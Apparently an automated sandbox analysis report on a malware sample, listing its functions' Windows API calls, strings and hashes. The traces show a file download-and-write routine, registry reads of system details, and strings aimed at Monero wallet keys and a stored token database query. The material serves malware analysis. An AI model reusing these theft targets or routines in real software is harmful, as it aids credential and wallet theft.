                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D48137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00D48158
                  • __aulldiv.LIBCMT ref: 00D48172
                  • __aulldiv.LIBCMT ref: 00D48180
                  • wsprintfA.USER32 ref: 00D481AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: 6b2a66a6044c365642848bf03d7167958be8954e4a1aad7b45c4a097151ad56b
                  • Instruction ID: 877e525ff5400aef074d791fb6aecc1f182bd687c8a8999bce680638bb61de91
                  • Opcode Fuzzy Hash: 6b2a66a6044c365642848bf03d7167958be8954e4a1aad7b45c4a097151ad56b
                  • Instruction Fuzzy Hash: 6A210BB1E44218ABDB00DFD4CC4AFAEB7B9FB44B54F104509F605BB280D778A9058BB6
                  Function 00D360A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                    • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                  • InternetOpenA.WININET(00D50DF7,00000001,00000000,00000000,00000000), ref: 00D3610F
                  • StrCmpCA.SHLWAPI(?,00AFE9F8), ref: 00D36147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00D3618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00D361B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00D361DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D3620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00D36249
                  • InternetCloseHandle.WININET(?), ref: 00D36253
                  • InternetCloseHandle.WININET(00000000), ref: 00D36260
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: c8fffad00e0a07d1e009029f35d58ed22c993e8899896e254873efa8b2148700
                  • Instruction ID: e75e1048205036c04572065f5237e672b4670246759d32a813b0ab9a8395bd73
                  • Opcode Fuzzy Hash: c8fffad00e0a07d1e009029f35d58ed22c993e8899896e254873efa8b2148700
                  • Instruction Fuzzy Hash: BD5150B194021CABEB24DF50DC45BEE77B8EB44705F108098B609A71C1DB74AA89DFB6
                  Function 00D3BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                  • lstrlen.KERNEL32(00000000), ref: 00D3BC9F
                    • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00D3BCCD
                  • lstrlen.KERNEL32(00000000), ref: 00D3BDA5
                  • lstrlen.KERNEL32(00000000), ref: 00D3BDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 0a5b3f98a1e5ddfd4f90300e473f8cd2407d11acfd7941a1e0a4bf28a86fb1a5
                  • Instruction ID: 27a289a3259ceb67e6dc5e55f6be3076e9db77044a696cfda1f2f93b95af7063
                  • Opcode Fuzzy Hash: 0a5b3f98a1e5ddfd4f90300e473f8cd2407d11acfd7941a1e0a4bf28a86fb1a5
                  • Instruction Fuzzy Hash: 61B15F72950118ABEF04FBA4DC96EEE7338EF54300F414569F506A6092EF346A49CBB2
                  Function 00D46770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: d987220159e8c4fc5e82c0e9ef09fcaacd666e3e225fbd1d2c36a54a4f0aa0a3
                  • Instruction ID: 35a20622ada58213bfd348c63983debaa4334f62f83bb861bd3867b6b44d4494
                  • Opcode Fuzzy Hash: d987220159e8c4fc5e82c0e9ef09fcaacd666e3e225fbd1d2c36a54a4f0aa0a3
                  • Instruction Fuzzy Hash: 18F05E3090420DEFD3489FF0E90972C7B70FB45703F050198E60E86690D6748B83ABA7
                  Function 00D34FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D34FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D34FD1
                  • InternetOpenA.WININET(00D50DDF,00000000,00000000,00000000,00000000), ref: 00D34FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00D35011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00D35041
                  • InternetCloseHandle.WININET(?), ref: 00D350B9
                  • InternetCloseHandle.WININET(?), ref: 00D350C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: ae5bb0824b9cdbd22b3f41a08550d37c714ff69a2882043030346f761e0f6ec4
                  • Instruction ID: a039eba7441a0c6334cf766fa7e87db06c2b0ca035a2b2372237ccc1e2b23e82
                  • Opcode Fuzzy Hash: ae5bb0824b9cdbd22b3f41a08550d37c714ff69a2882043030346f761e0f6ec4
                  • Instruction Fuzzy Hash: 7C31F8B4A4021CABDB24CF54DC85BDDB7B4EB48704F1081D9FA09A7281D7706EC59FAA
                  Function 00D483DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D48426
                  • wsprintfA.USER32 ref: 00D48459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D4847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D4848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D48499
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,00AFE080,00000000,000F003F,?,00000400), ref: 00D484EC
                  • lstrlen.KERNEL32(?), ref: 00D48501
                  • RegQueryValueExA.ADVAPI32(00000000,00AFE0C8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00D50B34), ref: 00D48599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D48608
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D4861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: a0b56d8e27978c86d6b938c089e6b6d001feca56a095a2070c67813b62465333
                  • Instruction ID: df9d4c486a0a8c269230634400afcae761c012007c2b8a12a3b58eb5f287d778
                  • Opcode Fuzzy Hash: a0b56d8e27978c86d6b938c089e6b6d001feca56a095a2070c67813b62465333
                  • Instruction Fuzzy Hash: ED210A7190021C9BDB64DB54DC85FE9B3B8FB48700F04C198E609A6180DF716A85DFE5
                  Function 00D47690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D476A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D476AB
                  • RegOpenKeyExA.ADVAPI32(80000002,00AEC320,00000000,00020119,00000000), ref: 00D476DD
                  • RegQueryValueExA.ADVAPI32(00000000,00AFDE70,00000000,00000000,?,000000FF), ref: 00D476FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D47708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: a328e1141c2c01a32271ec93e3064dc3449d232884625a6ae53a4418fd1d50a1
                  • Instruction ID: 08db1175388a9351d8f3cee2affad0615e3a42b9e829ddcc0f9e8650bde4c370
                  • Opcode Fuzzy Hash: a328e1141c2c01a32271ec93e3064dc3449d232884625a6ae53a4418fd1d50a1
                  • Instruction Fuzzy Hash: 110162B5A44208BFDB00DBE4DC49F6DB7B8EB88701F104454FA08D7291D77099449F63
                  Function 00D47720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D4773B
                  • RegOpenKeyExA.ADVAPI32(80000002,00AEC320,00000000,00020119,00D476B9), ref: 00D4775B
                  • RegQueryValueExA.ADVAPI32(00D476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00D4777A
                  • RegCloseKey.ADVAPI32(00D476B9), ref: 00D47784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 49ced265fe04f99129ed51ad0e83ee729a41273094271429fa881011866cde97
                  • Instruction ID: db51f9f5abcc00c6b8a5123e796caee5609ed7d59fe87d07c41ac0590ed7d6b8
                  • Opcode Fuzzy Hash: 49ced265fe04f99129ed51ad0e83ee729a41273094271429fa881011866cde97
                  • Instruction Fuzzy Hash: DB0144B5A40308BBDB00DBE0DC49FAEB7B8EB44701F004554FA09A7281D67055409B63
                  Function 00D440B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00D440D5
                  • RegOpenKeyExA.ADVAPI32(80000001,00AFDD20,00000000,00020119,?), ref: 00D440F4
                  • RegQueryValueExA.ADVAPI32(?,00AFE398,00000000,00000000,00000000,000000FF), ref: 00D44118
                  • RegCloseKey.ADVAPI32(?), ref: 00D44122
                  • lstrcat.KERNEL32(?,00000000), ref: 00D44147
                  • lstrcat.KERNEL32(?,00AFE458), ref: 00D4415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValuememset
                  • String ID:
                  • API String ID: 2623679115-0
                  • Opcode ID: 2bc862e23049522353f557efbe5a534fc225ec1847c73ec0f35945cba9fd7dcf
                  • Instruction ID: 11dcba6ed4d712a5339298d4114b35f22c812935002097a905f20414dc60dc9a
                  • Opcode Fuzzy Hash: 2bc862e23049522353f557efbe5a534fc225ec1847c73ec0f35945cba9fd7dcf
                  • Instruction Fuzzy Hash: 8C4136B690010C6BDB14FBA0DC56FEE737DEB88300F404558B61A96181EA755BC89BB3
                  Function 00D399C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                  • LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
